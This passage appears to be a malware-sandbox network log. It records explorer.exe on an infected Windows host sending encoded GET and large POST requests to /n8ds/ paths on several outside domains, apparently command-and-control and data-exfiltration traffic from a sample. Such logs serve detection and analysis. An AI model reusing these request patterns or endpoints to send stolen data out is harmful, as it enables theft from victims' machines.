Nov 25, 2021 12:59:26.649240971 CET	6472	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Nov 25, 2021 12:59:26.750144958 CET	6473	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.11.20	49830	66.29.140.185	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:59:31.834853888 CET	6484	OUT	GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1 Host: www.lopsrental.lease Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:59:32.055282116 CET	6491	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2021 11:59:31 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.11.20	49835	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 13:00:58.945292950 CET	6501	OUT	POST /n8ds/ HTTP/1.1 Host: www.inklusion.online Connection: close Content-Length: 131142 Cache-Control: no-cache Origin: http://www.inklusion.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.inklusion.online/n8ds/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 36 6c 64 44 3d 33 56 45 69 59 58 53 66 54 54 54 35 52 6b 67 39 58 4c 78 76 35 4a 39 46 77 44 34 32 41 57 44 75 43 38 4d 7a 52 61 6e 69 76 71 45 6e 38 4b 6f 79 66 6b 55 4f 47 44 69 6d 58 77 77 58 48 37 58 6b 4e 59 34 6f 4e 63 6b 78 69 7a 31 68 67 70 79 4d 6d 67 6e 61 6c 30 67 69 47 4f 76 30 77 55 51 58 6c 52 4d 62 6f 79 6f 55 35 73 62 34 78 37 6a 33 75 7a 7e 75 28 53 35 6d 28 6c 69 5a 4e 39 6e 30 7a 35 32 6a 65 76 30 69 35 46 36 30 73 52 64 71 63 34 76 4a 28 77 4b 46 67 42 50 36 39 75 46 56 6a 71 39 6f 56 38 6f 50 50 5a 38 4d 58 30 72 63 4f 4e 76 31 7a 79 37 4e 38 44 34 52 6d 33 4d 4a 31 53 58 36 6e 42 39 42 36 4a 71 45 45 55 49 62 5a 72 58 6f 33 65 55 77 47 79 62 5f 69 59 31 47 6e 74 71 64 75 4b 64 31 78 75 34 57 50 57 6c 4a 6c 54 4b 4f 39 4b 73 66 6c 4e 47 54 33 67 53 64 53 44 6d 30 69 5f 4d 54 64 45 6d 68 4d 69 6f 54 31 35 79 37 45 4f 7e 66 6a 70 4e 2d 59 45 67 47 28 56 50 70 49 59 78 4e 6e 41 41 44 44 46 56 49 33 6e 61 56 37 79 70 39 58 35 46 46 35 56 66 50 76 55 39 43 4f 30 68 61 55 61 45 4c 66 33 72 5f 6c 76 45 34 61 73 48 36 78 4a 6d 70 46 6b 65 2d 4c 42 62 71 39 46 78 34 76 4c 51 34 63 42 62 64 4a 65 71 65 70 4c 52 6e 49 4b 6e 67 42 70 66 44 50 6c 73 5a 77 73 62 43 4d 31 45 31 66 63 72 5f 65 35 42 52 6a 56 41 49 7e 36 35 62 34 46 66 33 42 4c 51 7a 6b 75 4c 62 51 68 45 5f 67 50 59 65 70 73 54 47 69 76 68 32 6e 6f 57 74 32 36 53 45 6b 5a 63 49 48 4f 74 6b 63 4f 41 4b 68 62 6c 51 6e 34 64 7a 30 4a 54 51 28 38 4f 67 30 33 49 6d 66 43 4f 67 4a 73 4c 63 6e 77 4f 72 44 56 45 66 62 51 4c 72 6d 65 52 79 74 37 62 63 43 46 58 72 75 55 44 65 61 6d 59 47 66 46 64 55 32 54 6e 77 66 5a 51 64 38 32 6c 2d 36 75 47 4c 66 64 75 41 68 4c 33 65 64 71 5a 37 6c 4a 6a 47 72 6b 79 38 70 44 76 4b 50 72 49 53 70 4b 44 76 59 6c 39 6e 66 41 64 75 32 51 44 55 62 31 39 31 31 6a 65 78 73 66 7e 46 61 54 64 79 74 41 6f 30 6f 70 28 54 55 53 36 56 53 56 50 44 70 75 28 4b 6e 36 52 57 42 63 46 30 35 36 62 61 49 4f 6a 6d 6b 43 30 75 33 54 5a 33 59 41 61 35 49 45 51 7a 75 64 69 64 31 37 62 37 44 50 7e 45 31 46 4c 30 43 37 4e 6a 65 42 4d 66 55 39 4f 4d 55 36 58 58 79 49 33 33 58 34 4c 4d 72 53 70 6b 78 53 34 2d 67 32 37 49 4b 71 65 79 6b 5a 6f 56 4c 56 66 67 4a 79 6e 77 30 56 71 44 32 4f 67 75 7e 41 59 6c 57 7a 39 42 47 53 53 71 61 2d 70 53 6c 44 34 71 43 6e 52 6b 62 77 31 63 57 6b 54 41 30 6f 4a 43 57 6f 63 31 49 73 31 50 4e 4b 4c 4f 46 4e 47 30 43 6b 4a 6d 37 52 79 66 71 62 6f 52 7a 6d 62 72 46 36 4a 75 65 68 32 58 74 65 48 38 70 6f 73 35 36 37 55 37 54 71 57 64 71 66 62 46 78 4a 62 56 4a 51 38 32 51 72 52 6b 4f 43 70 49 5a 45 57 6a 4b 58 43 32 5a 73 4d 53 35 77 34 56 57 78 69 78 4e 6f 4d 39 55 42 71 4d 30 31 38 5f 54 5f 34 62 30 58 63 46 34 47 55 30 32 4f 53 42 65 44 79 56 62 6b 78 67 57 6e 67 74 48 49 56 70 6b 68 49 42 4a 73 61 6a 7a 67 48 41 58 76 61 52 53 47 66 34 45 37 50 42 39 66 46 76 77 52 41 71 6d 71 53 77 49 69 64 2d 76 57 68 44 49 6f 66 5a 6c 62 46 6f 71 76 75 33 49 59 62 75 52 6c 34 78 4d 58 67 38 36 65 44 44 46 41 52 50 45 69 51 54 49 63 54 75 4e 38 7a 46 50 43 53 56 76 64 66 79 77 76 6e 4c 51 56 70 44 53 38 43 79 34 6e 4d 47 7a 46 70 53 28 73 4c 72 78 76 31 43 47 73 30 33 30 4a 35 68 4b 67 31 75 46 39 6d 59 57 2d 68 51 28 37 51 38 52 78 45 41 78 4e 45 6f 66 67 4b 68 6f 54 34 79 59 62 51 47 54 77 68 4f 50 50 64 55 7e 6d 28 62 6b 61 69 45 54 79 75 6b 61 5f 4c 71 73 38 77 68 50 35 77 77 5a 70 43 62 57 6f 70 41 4c 32 31 35 39 32 42 5a 4d 61 44 76 35 53 62 37 31 4f 6c 53 45 73 7e 44 6c 38 41 67 56 54 58 6f 63 6b 52 54 6f 57 48 37 37 6a 66 45 6f 6d 47 65 74 37 63 74 39 6e 7e 53 35 66 38 77 39 6e 57 43 57 4b 56 58 61 37 33 66 79 31 57 72 36 59 30 2d 33 52 36 46 31 54 30 43 75 69 66 46 68 63 5a 38 59 58 66 47 37 67 6f 58 64 35 37 41 4b 5f 6e 4c 4f 4e 6f 2d 6d 75 75 31 6c 75 32 4b 28 5f 41 44 59 6a 48 6c 49 4e 50 6f 41 54 53 71 4d 50 6e 55 7e 56 72 4f 44 63 73 70 4a 6e 4d 75 61 33 30 49 78 32 6e 66 68 62 4c 62 54 57 58 65 78 36 4b 64 59 63 54 67 65 77 6f 61 7a 76 6e 71 42 47 4e 6e 28 32 35 78 57 4d 51 5f 71 73 41 38 5a 31 57 78 66 70 71 6c 7a 65 4a 4d 5a 77 6b 51 63 37 30 6c 4c 71 48 73 4b 59 47 6c 6e 69 42 79 67 33 38 4d 65 30 41 64 6b 79 Data Ascii: 6ldD=3VEiYXSfTTT5Rkg9XLxv5J9FwD42AWDuC8MzRanivqEn8KoyfkUOGDimXwwXH7XkNY4oNckxiz1hgpyMmgnal0giGOv0wUQXlRMboyoU5sb4x7j3uz~u(S5m(liZN9n0z52jev0i5F60sRdqc4vJ(wKFgBP69uFVjq9oV8oPPZ8MX0rcONv1zy7N8D4Rm3MJ1SX6nB9B6JqEEUIbZrXo3eUwGyb_iY1GntqduKd1xu4WPWlJlTKO9KsflNGT3gSdSDm0i_MTdEmhMioT15y7EO~fjpN-YEgG(VPpIYxNnAADDFVI3naV7yp9X5FF5VfPvU9CO0haUaELf3r_lvE4asH6xJmpFke-LBbq9Fx4vLQ4cBbdJeqepLRnIKngBpfDPlsZwsbCM1E1fcr_e5BRjVAI~65b4Ff3BLQzkuLbQhE_gPYepsTGivh2noWt26SEkZcIHOtkcOAKhblQn4dz0JTQ(8Og03ImfCOgJsLcnwOrDVEfbQLrmeRyt7bcCFXruUDeamYGfFdU2TnwfZQd82l-6uGLfduAhL3edqZ7lJjGrky8pDvKPrISpKDvYl9nfAdu2QDUb1911jexsf~FaTdytAo0op(TUS6VSVPDpu(Kn6RWBcF056baIOjmkC0u3TZ3YAa5IEQzudid17b7DP~E1FL0C7NjeBMfU9OMU6XXyI33X4LMrSpkxS4-g27IKqeykZoVLVfgJynw0VqD2Ogu~AYlWz9BGSSqa-pSlD4qCnRkbw1cWkTA0oJCWoc1Is1PNKLOFNG0CkJm7RyfqboRzmbrF6Jueh2XteH8pos567U7TqWdqfbFxJbVJQ82QrRkOCpIZEWjKXC2ZsMS5w4VWxixNoM9UBqM018_T_4b0XcF4GU02OSBeDyVbkxgWngtHIVpkhIBJsajzgHAXvaRSGf4E7PB9fFvwRAqmqSwIid-vWhDIofZlbFoqvu3IYbuRl4xMXg86eDDFARPEiQTIcTuN8zFPCSVvdfywvnLQVpDS8Cy4nMGzFpS(sLrxv1CGs030J5hKg1uF9mYW-hQ(7Q8RxEAxNEofgKhoT4yYbQGTwhOPPdU~m(bkaiETyuka_Lqs8whP5wwZpCbWopAL21592BZMaDv5Sb71OlSEs~Dl8AgVTXockRToWH77jfEomGet7ct9n~S5f8w9nWCWKVXa73fy1Wr6Y0-3R6F1T0CuifFhcZ8YXfG7goXd57AK_nLONo-muu1lu2K(_ADYjHlINPoATSqMPnU~VrODcspJnMua30Ix2nfhbLbTWXex6KdYcTgewoazvnqBGNn(25xWMQ_qsA8Z1WxfpqlzeJMZwkQc70lLqHsKYGlniByg38Me0AdkyruYp1Xo4STz7m_U_3waXxjWtCXZuAYBrev~P~MTvIjoHdFuCw-YSH6fCRgiRTl8KHQ03sdoZwgQog09LIqh8MArqB3Z4lbo6hd425zNm6s4vSU7yBDwdSZ9w~FzEfqRuuap8KifCh9Hxwg8axP4QymV8GEpewttVbyRsK6VFqsUnsEvpw-G-qDafQ4gnrbBdF4WeX6b0KINVsW4W(p4iXWwoVEApuvDLa9dUdAk9NECUWdAqWiFElBP_qV8BuAGHH8fPmxbpD_tRgTZYZznP1RqRbRmfIvX_7jlLFD9eX-cdT0~To-E6O9kycoOFh-d63xWMfHwjy_3pUFhxQX0wyeixsHtFioR5lIwNm9Sk~ok8(ftDwxiIN-Br~rsmlSHBLt27u4oXFx18Wtom~l7MD762uFaIbYciBD19sfx2ImW6Cu7kCX~RMy8h7luVB-P5RnuxIpR0L9lr8HLpzToWgkhMRX7LAj2opRyt2hXnuzXCPbC7xBFinqMKJJ4WiAABiQgXLyFQ83mcWlOr6J6frYnu2FdkJQTdvGOrEB1U4AOfVDiNDiyTq2LNIBgBPWZ7u_IH8LqCscYeChJhPsBM4_jkdko6iBQhVJJWre~acneo81E5~sUrtcDa2872zGKGbLI_gBbcXiyAggg6joc5N5l7LgbB5Sk6mGlKCMv0J5cQhNGwk45Ss5CCilxwMWbOxzHM9NIM4yc6E4HyHsMpxbsLw1pAovl2xEcNXL3H(QsGt0a-(NyR97AJL5OFB5T_jUEaQWgDQ9VZly3sDTf4hfN6qb3Ek6Kgn6VxPedit2NphtLod6mWuU9cZrW8(PO5vB0_iG4oUHkmbry5z5DPUA9J3Y7vURRDZ677xKggyxLqQopyCin2uvlZrAfH7xMdPvoPIcl7UwUlHo66rpp-s4nMuqUllFkZv2hg6V5yRdR8rA9MyvbUBujyMlFnVudtRF5fWY8IP1uqGHtAIpYT5JqbuE3e8hFNMPRDaffGlXXHY4Puu0B9AfCtChMX6lNmh9NPWgQA0HQRpFjB4z1wKrhFg8QM1nLV0Vuu2TkX244HSD204JWtsG58SYY_gRe6u21h9iB4HsPY1qOqXEE3VZILg61tdo~McWtgTkcyBcHm3IjjuK4SrM2G(ebz2l8Rad64(OLOpasQVteb49VFSE5uoYgyTojLJTbx78g80JtFNf2yH3QEjv9rEmlgh7r-Jz9AHVS70xphM_TPRTO4ly1XojPwhNjWHuV2RMdRVbwnt-7ACGP43fzkZ7Jhg4lo0xcRF0FjUZR0mPyiyg3jfE2K10GrHp~z0gql~TXQkbok83Yf8vMMGBBSFFpVHwNzY_ApXeGE6ziBD8vVy_8B94kruVzXTCqE~Kh-WVl-gQ4h5Gkywuj7U_GvozjBXrKLtW9LnEiHZV~9FQT-OH1s5YcavtY5FxSk9WCfPN5SDbXXQyOoHqT0Uc4EWOO53Us5j_4ohEEr98WEwwi8oN3gmR6SLpPXT_tbpvW9YVgHBI7DMUPzef~adFQaiyBd4yH2XuduslxrpISxM8cdwZ1U4aGUhkS7lMATmSP-Kxn51aupTqp6~XHWLqnEy-eyDEUiCbp6Y4YPrHB6V0A0QF5JxnTchHSnh0W3K-9oqvJkLQ3CJ5TDPcj4(HXaATth(8y-NnvBrAVuvmBu7lxWM9xRp5yIjJ7GJEaGr_XMjLCuHAYN3oYugz9mLgeTRFI_hssoQtCexJHE7jygXlPDj_e90QkKQwj_1LMZ08SFtGyDJIG2NbVhWhqWUBlLrbInlQA-(2jlRbjeCUeZwpqAoV0q1lm6jGpDKtsbGkkkwWecGO(kCiYmmPI5tMhL5Q~NacIYvqXMNLTLwZD72f5Yp2X5uO(djJ6Q3ztCVfqYFz4gkH1sNHLkbAiWAoSjoxf3tOB5x7STD6RySIaSaOT7aK0BhOeDIrDiQASg27JhryfrDULz2iLOw-lyER7Y9HDMxYEyclYtVCoP65B6xaX8SkIRoLLAWvP2gLWMs3tPpXkKkcGoK0(VK-K2h0FXUWozkLA4rGitIPfGiiSfxYHO~1XgbIMsc4THJKgyE5g-AdNGT3XBjQUhR-rZavrSieHuB3UAlyBZGaWBNbDOY0e6eDD-Dj4W265SD9bjbbkWS99usJt7y7cs6IJEenl4uqw4YBXgNI8ExUYPIO~d22n86hhrT0FIkxoUaNANlax6dViXmgb9e3UlW6vG8UO_D0IQMG7HylVHCkRTxOxWH46Cr3sXfLqTYz(KtGLqjTLdeoqrWytuwcPo3cwJTtjE72fTES28ZYNV8RZvSt1lHdsiOW2TXwIFMOElWFHkmMqAre9cah0dXFYgElFlyuxGAN5GUyhI3qxkr76-LJStPb5YxJCvb-A7L23md72uUtH7ZGR5w7nZ~98GG90dXLq0ZSf2cu~D~o1CQ1GHPZeJXD~nCpqepD92WYykAHhBgJ(PPW2E(YCIW8ks1DFFh3nNgJ(j2HVsoVIgwF2bPwt4aJXGrsbTwdCho10YfkB-QtkFm0j8ZVyNMRMr80Hm6FqbgBTrzClW4da0u1eiatVnXIOf9wkNVk7gE1(ayv0kXCVRrRpFtpjXW99jOS12ljnMK_iI32a4mpXnkWwPFt0fuqBaYkY_F8WOzt5GMX0NTyClVk85(2TO6Rv1bgot6wxm5KzGx0jY76o0oCoyTVOlkWL417C_TANXEse40bq3h-8
Nov 25, 2021 13:00:58.945389986 CET	6507	OUT	Data Raw: 4a 68 42 4b 58 5f 63 53 59 44 45 74 58 52 33 4b 31 79 58 44 66 53 78 5f 69 4d 67 6a 49 42 57 6b 45 44 74 53 77 47 75 5a 45 75 43 79 30 5a 56 46 6b 6e 36 47 45 68 7e 57 6d 32 68 45 45 7a 78 5f 4a 36 6c 79 73 41 44 72 4a 36 48 52 53 35 43 46 67 38 Data Ascii: JhBKX_cSYDEtXR3K1yXDfSx_iMgjIBWkEDtSwGuZEuCy0ZVFkn6GEh~Wm2hEEzx_J6lysADrJ6HRS5CFg8jWVRp4Ko20weYU61Zmo1mNU4OgJC(jNOObgqC2ONJEJ9OkqfiXQa0Y5LeVJun4nCNhJBMAnjeczbIVERvtIECCatnRXxxD1ToKb-7ZOPi9lQ~yPUh8mlKqg4VFkGCrW3lZb_kJHgAtdffEKsc9Ruwo2vmjpbAAlAY
Nov 25, 2021 13:00:58.956954002 CET	6510	OUT	Data Raw: 46 34 69 4e 6e 49 33 6f 76 65 73 54 55 4d 50 78 61 4b 58 2d 39 5f 4c 43 66 61 56 50 4b 62 41 69 32 63 56 32 36 57 28 77 69 5a 5a 78 37 4e 58 32 53 4b 61 74 30 6a 47 69 5a 6f 70 64 5a 76 71 75 70 72 43 4d 43 39 4c 57 37 76 4d 55 39 73 62 43 4c 55 Data Ascii: F4iNnI3ovesTUMPxaKX-9_LCfaVPKbAi2cV26W(wiZZx7NX2SKat0jGiZopdZvquprCMC9LW7vMU9sbCLUvejR1F0xYbDBDLoujmGT9lsxzo~FcOi89OOa9XkgPFK0uC~D2gcC9DzOtr69vHLajgGvJitnE_IjSudPt2s46Z~6e0DELz3OV-4g~a7Udte1wrlE4EmqoGLCNDldErazXooFAjbfRLpUbSm5wEVJGxzOXtFJ4W8Kp
Nov 25, 2021 13:00:58.957125902 CET	6518	OUT	Data Raw: 5a 63 35 52 61 6d 36 71 74 4b 59 74 38 66 48 46 4d 59 42 48 35 6d 54 4c 56 58 64 78 65 66 55 49 73 6d 70 73 4a 45 65 4d 61 6c 38 31 76 73 65 6e 51 6e 4a 6e 59 50 77 63 75 70 4c 36 4e 68 4c 73 77 73 71 6e 61 52 70 64 44 48 6d 71 50 30 37 51 6c 53 Data Ascii: Zc5Ram6qtKYt8fHFMYBH5mTLVXdxefUIsmpsJEeMal81vsenQnJnYPwcupL6NhLswsqnaRpdDHmqP07QlSfcNYnAJF0Xwf76Ax0i6q(FnmXcdL~u5hygk0E7pUNmt50iFlk6JEQ6wlLlxqt2VO10i4IswT~P26mhd-Zy(Gm7LUWyJ7hNIptCTE3wm0OSNbuDGIl3EhVbyILXsdg9ro2NDy7KHvR1DCHp~F0KLOZtC8OGItiKFSH
Nov 25, 2021 13:00:58.957299948 CET	6524	OUT	Data Raw: 72 45 4d 72 4b 5a 6c 66 4a 76 75 37 58 75 36 6f 4e 37 6a 41 7e 69 32 68 32 6a 31 6b 62 4e 73 7a 4d 35 45 6c 42 66 61 56 45 4c 50 43 54 56 36 36 67 54 43 59 39 32 72 66 4e 7a 64 5f 47 63 7a 33 4f 37 78 5a 37 52 70 4e 79 75 28 57 5a 66 69 64 4a 67 Data Ascii: rEMrKZlfJvu7Xu6oN7jA~i2h2j1kbNszM5ElBfaVELPCTV66gTCY92rfNzd_Gcz3O7xZ7RpNyu(WZfidJgaKyezMZtev2rF1B5uaWQzeXtFEF2lWrHW7NLfQULKFu37ikIn3A6QviLaASKGH2Q5H6REmHiZJNHErOMVqKk3nqpdDBVypS0aHiLHlEeQyT-uMBUqcW6Sewol5epEJ~2nogplwMhMFi0p7k4tquseiVvCNPJBxJH2
Nov 25, 2021 13:00:58.957483053 CET	6533	OUT	Data Raw: 4d 50 56 70 54 76 33 69 6c 50 4d 4d 4e 4c 66 6d 7e 39 4d 50 44 4b 49 72 28 72 67 38 37 46 65 31 72 54 4f 4a 49 7a 44 54 61 76 6f 72 66 72 58 50 6f 39 31 4d 72 46 6a 56 44 43 53 43 6e 41 50 30 4e 2d 61 4a 55 6f 6c 6b 52 63 46 31 45 6e 33 6d 72 54 Data Ascii: MPVpTv3ilPMMNLfm~9MPDKIr(rg87Fe1rTOJIzDTavorfrXPo91MrFjVDCSCnAP0N-aJUolkRcF1En3mrT1LJWcTTWNDBGY9kDtYftL65Gy1XWYPeRsf8ckaB4OBNIhgQQisOmFJCJsB0KjbsYTus6HnwGQS6hqM0LJLWZL0HctIq6Iq33tKM64UK5T8F2CvYSxtTsKo1YTxE29pczAqSd3qktRjpN4LpE(t1Dfnlj9TDQ4Ghm8
Nov 25, 2021 13:00:58.957855940 CET	6533	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 25 Nov 2021 12:00:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49840	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.11.20	49836	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 13:00:58.958116055 CET	6534	OUT	GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 13:00:58.969938040 CET	6535	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 25 Nov 2021 12:00:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.11.20	49838	203.170.80.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 13:01:15.913723946 CET	6719	OUT	POST /n8ds/ HTTP/1.1 Host: www.mackthetruck.com Connection: close Content-Length: 131142 Cache-Control: no-cache Origin: http://www.mackthetruck.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mackthetruck.com/n8ds/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 36 6c 64 44 3d 75 52 32 58 78 37 68 56 58 5f 62 50 4b 2d 6a 44 30 33 63 4a 50 36 55 43 79 75 38 56 4e 77 43 75 4f 2d 4d 41 46 6d 7e 32 35 31 7e 62 4e 35 52 4a 55 52 53 50 69 59 78 6d 4e 6f 4a 56 74 4c 55 67 30 7a 52 37 6a 75 53 78 34 69 59 2d 47 52 42 47 59 72 63 2d 33 33 63 49 47 49 30 59 55 79 7e 6a 62 57 7a 70 7e 75 58 41 63 74 7a 4d 32 6c 79 39 55 6c 30 38 28 4e 34 56 28 32 41 57 77 49 44 4c 62 35 7a 5f 53 31 34 37 66 71 45 34 6b 2d 56 4c 78 45 67 6a 49 4d 54 64 6d 36 71 6f 61 38 45 30 33 73 53 33 6f 71 72 6b 53 32 31 66 5a 57 47 50 61 68 41 58 53 34 53 42 58 46 58 52 6b 64 7e 6a 61 6a 5a 41 7a 49 65 34 6e 43 47 68 77 64 35 42 32 64 52 74 65 37 6b 6a 69 78 4e 62 58 6a 53 54 58 52 4e 2d 68 71 37 43 44 50 78 46 6a 43 79 58 78 64 5a 75 77 5a 5a 46 58 32 6b 70 77 47 75 33 74 47 51 6b 51 7a 54 38 37 48 38 6e 71 61 61 65 75 65 34 65 73 52 4c 57 67 67 6a 74 79 37 68 52 34 65 47 46 44 76 54 48 28 31 75 78 43 53 51 63 30 58 64 34 44 54 47 32 64 62 59 4f 54 65 54 75 74 47 73 31 45 73 30 38 43 38 53 2d 39 6b 62 57 32 52 76 66 56 4f 50 74 4a 42 50 78 68 6f 48 4b 41 6a 4f 56 4e 52 46 67 4e 52 61 71 58 51 49 42 33 36 33 59 44 44 6c 39 73 4b 35 38 43 76 7e 66 58 36 42 63 31 37 4c 4c 38 5a 54 5f 7e 74 41 46 51 58 4c 64 63 73 79 56 70 6f 48 55 52 31 7e 50 31 62 6d 6f 75 32 6a 32 77 30 56 65 62 49 4f 39 73 4f 77 6d 73 77 44 43 69 4c 6f 78 48 76 6e 2d 64 6e 44 6f 54 66 4f 4a 79 56 35 